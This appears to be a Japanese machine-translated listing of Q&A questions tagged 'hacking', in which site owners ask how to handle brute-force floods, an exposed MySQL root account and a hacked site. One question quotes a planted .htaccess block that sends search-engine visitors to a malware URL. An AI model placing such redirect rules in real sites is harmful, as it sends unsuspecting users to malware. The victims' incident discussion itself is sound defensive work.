タグ付けされた質問 「hacking」

ハッキングとは、サーバーまたはネットワークのセキュリティの弱点を悪用することによるセキュリティの違反です。

5
私のサイトは最近攻撃されました。私は何をしますか?
これは私にとって初めてです。私が運営しているサイトの1つが最近攻撃されました。まったくインテリジェントな攻撃ではありません-純粋なブルートフォース-すべてのページとすべての非ページを、あらゆる拡張機能で攻撃できます。すべてのフォームにゴミデータを投稿し、ランダムなURLにも投稿しようとしました。すべてのtod、1時間で16000リクエスト。 この種の動作を防止/警告するにはどうすればよいですか?特定のIP /クライアントのリクエスト/時間を制限する方法はありますか? ユーザーに報告すべき場所はありますか?彼らは中国から来たようで、有効な電子メールのように見えます。
10 security  hacking 

5
Matasanoはどのようにハッキングされましたか?
から:http : //seclists.org/fulldisclosure/2009/Jul/0388.html http://news.ycombinator.com/item?id=723798の投稿から私がそれを最もよく理解している場合、Matasanoの連中はsshdをインターネットからアクセスできるようにしました-これに対する提案された解決策(プログラミングの観点から)?

2
侵害されたFTPアカウントによるWebサイト攻撃の分析
私のサイトはハッキングされており、現時点ではいくつかの詳細を知っていますが、それがどのように発生したのか、または将来的にそれを防ぐ方法に正確に途方に暮れています。攻撃が再び発生するのを防ぐため、攻撃を分析するためにあなたの助けが必要です。これは少し長いですが、問題の解決に役立つ十分な情報を提供したいと思います。 これが起こったことです。 数週間前、ホスティング会社のGoDaddyからメールが届きました。私のサイトはリソースを使いすぎており、MySQLクエリが原因であると予想していました。問題のクエリは、5〜6語の検索クエリでした。私が設定した方法では、検索する用語が多いほど、クエリが複雑になります。問題ない。私はそれを修正しましたが、同時にGoDaddyも一時的に私のアカウントをシャットダウンし、すべてが正常に戻るまでに約3日かかりました。 その事件の後、私の検索エンジンのトラフィックは劇的に、約90%減少しました。私はそれを何も考えていなかったので、それをクエリの大失敗に書いて、グーグルがサイトを再クロールしたときにそれが時間内に戻ると考えて、それはうんざりしました。そうではなかった。 数日前、自分のサイトでマルウェアがホストされているというメールがユーザーから届きました。ブラウザに直接サイトを読み込みましたが、ページに何も挿入されていませんでした。次に、.htaccessファイルを確認したところ、次のことがわかりました。 <IfModule mod_rewrite.c> RewriteEngine On RewriteOptions inherit RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC] RewriteRule .* http://sokoloperkovuskeci.com/in.php?g=584 …

3
セキュリティで保護されていないMySQL 'root' @ 'localhost'アカウントにリモートアクセスしますか?
少し背景:PBXシステムがハッキングされたところです。サーバー自体は安全なようです(ログに記録された無許可のコンソールアクセス-SSHなど)。しかし、どういうわけかハッカーは新しい管理ユーザーをPBXソフトウェア(FreePBX、MySQLに支えられている)に挿入できました。Apacheログは、ハッカーがWebインターフェース(またはWebインターフェースのエクスプロイト)を使用せずにユーザーを追加したことを示しています。 その後、MySQLがrootパスワードなしで実行されており(!!)、外部IPアドレスに公然とバインドされていることを発見しました(明らかに、これをロックしました)。ただし、MySQLで唯一のルートレベルのユーザーは'root'@'localhost'およびであり'root'@'127.0.0.1'、どちらもローカルでのみアクセス可能である必要があります。 だから、私の質問はこれです: MySQLへの接続をスプーフィングして、リモートIPアドレスから 'root' @ 'localhost'ユーザーへの接続を許可し、ローカルで他のエクスプロイトを実行する方法はありますか? 参考までに、ボックスはMysql 5.0.95を実行するCentos 5(Linux 2.6.10)です。

1
バナーグラブDNS?[閉まっている]
1つのバナーはどのようにしてDNSを取得しますか?HTTP / FTP / SMTPなどの他のサービスをバナーで取得できますが、DNSの場合はすぐにはわかりません。 通常、HTTPで使用ncしHEAD / HTTP/1.1 {ENTER}{ENTER}ます。 クエリの初期構造がわかっていればDNSで可能だと思っていましたが、これに関するドキュメントが見つからないようです。
弊社のサイトを使用することにより、あなたは弊社のクッキーポリシーおよびプライバシーポリシーを読み、理解したものとみなされます。
Licensed under cc by-sa 3.0 with attribution required.